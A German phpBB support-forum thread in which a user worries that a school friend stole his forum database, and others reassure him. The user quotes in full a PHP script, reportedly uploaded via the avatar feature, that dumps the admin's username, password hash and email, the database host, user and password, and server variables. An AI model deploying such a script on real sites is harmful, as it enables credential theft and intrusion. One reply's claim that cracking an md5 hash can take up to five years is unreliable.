Freund meint Forum fast gehackt

[Gast660]

Also ein Freund meint das er schon eine Kopie meiner Datenbank hat, indem er dieses Script per Avatar upload auf meinen Space geladen hat.

Code: Alles auswählen

<?php 

define('IN_PHPBB', true); 
$phpbb_root_path = ''; 
include($phpbb_root_path . '/extension.inc'); 
include($phpbb_root_path . '/db/mysql.'.$phpEx); 
include($phpbb_root_path . '/common.'.$phpEx); 
?> 

<b><h2>Do Not Worry About the Errors Above. The Information you Want is below :-) </h2></b> 

<h4> 
Admin Forum Information:  </h4> 
<?php 
$uid = '2'; 

      $sql = "SELECT user_id, username, user_password, user_email 
         FROM  ". USERS_TABLE ." 
         WHERE user_id = $uid"; 
      if ( !($result = $db->sql_query($sql)) ) 
      { 
         message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql); 
      } 

echo "<table>\n"; 
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) 
 { 
 echo "\t<tr>\n"; 
 foreach ($line as $col_value) 
   { 
   echo "\t\t<td> $col_value </td>\n"; 
   } 
 echo "\t<tr>\n"; 
 } 
echo "</table>\n"; 
?> 
<h4> 
Database Information:<br/></h4> 
Database Type = <?php echo $dbms;?><br/> 
DB Host = <?php echo $dbhost;?><br/> 
DB Name = <?php echo $dbname;?><br/> 
DB User = <?php echo $dbuser;?><br/> 
DB Password = <?php echo $dbpasswd;?><br/> 
DB Table Prefix = <?php echo $table_prefix;?><br/> 
<p> 
<p> 
<?php print "Document root is ".$_SERVER["DOCUMENT_ROOT"]."<br />"; 
print "This page is called ".$_SERVER["PHP_SELF"];    ?> 
<p> 
<p> 
<p> 
<p> 
<h4>And here is a load of useful info</h4></p> 
<?php 
print_r($_SERVER); 
?> 
<p> 
<p> 

<?php 
print $_SERVER[""];#Built in Variable name 
?>

Jetzt will er auch noch die PW´s mit bruteforce knacken .. ich bin allerdings ein bisschen verwirrt, da er eben zu mir meinte, dass ich ihm mal meine Datenbank schicken soll, weil er noch was überprüfen wolle. Ich habe es aber natürlich nicht gemacht !!!

[gott]

lass ihn mal mit bruteforce

die

Code: Alles auswählen

md5 hasch

kracken

kann schon mal bis zu 5 Jahre dauern...

je nach prozessor

[Gast660]

Aber wieso kann er einfach eine Kopie meiner Datenbank machen ???

[gott]

hast du sie gesehen?

oder nur

hören sagen?

[Gast660]

Er meinte es nur !!!

Und er könne sie mir auch nicht schicken, da sie auf einem Server in Norwegen liege !!!

Und ich solle ihm meine Datenbank per ICQ schicken, weil er was überprüfen wolle ... was ich natürlich nicht gemacht habe !!!

[gott]

also hätte der Typ

Code: Alles auswählen

wirklich

Zugriff auf deine Datenbank hätte er ja schon alles löschen könnne

außerdem würde er wohl noch kaum DEINE Kopie brauchen!

ignorier den Typen einfach...

[Gast660]

ignorier den Typen einfach...

Geht nicht ...

1. Er geht auf meine Schule
2. Ist er ein Freund von mir ( allerdings seit dem er Kifft nicht mehr so doll )

Aber ich brauche mir keine Sorgen zu machen ???

[DerGonzo]

Das solltest Du auch nicht tun.
Wenn er sie wirklich auf einen Server hätte kopieren können, was sollte ihn dann daran hindern, sie auch woanders zu speichern?
Viel Gerede um dummes Zeugs!
Der will Dich verkäsematuckeln...

[gott]

hee - ich kiffe auch!



Wenn du phpbb 2.0.17 hast wird er nicht viel machen können! Sei also beruhigt - so lange er nur redet ABER nichts macht ist es doch egal

Sag ihm du willst Beweise haben? Wie vernünftige Menschen bei Gott auch

da müssen PROFIS erst mal Scripts schreiben die jeder versteht - gibt es ja für alle Vorgänger versionen schon...
Wird kommen, aber bis dahin gibt es auch schon ein update

[kellanved]

War denn das tolle Script wirklich auf Deinem Webspace?

Über den Avatar-Upload lassen sich Scripte kaum hochladen, da a) der Dateiname überprüft wird und b) auch der Dateityp überprüft wird.

Bei älteren phpBB Versionen mag es möglich sein Javascripts hochzuladen, aber die können keinesfalls die Datenbank auslesen.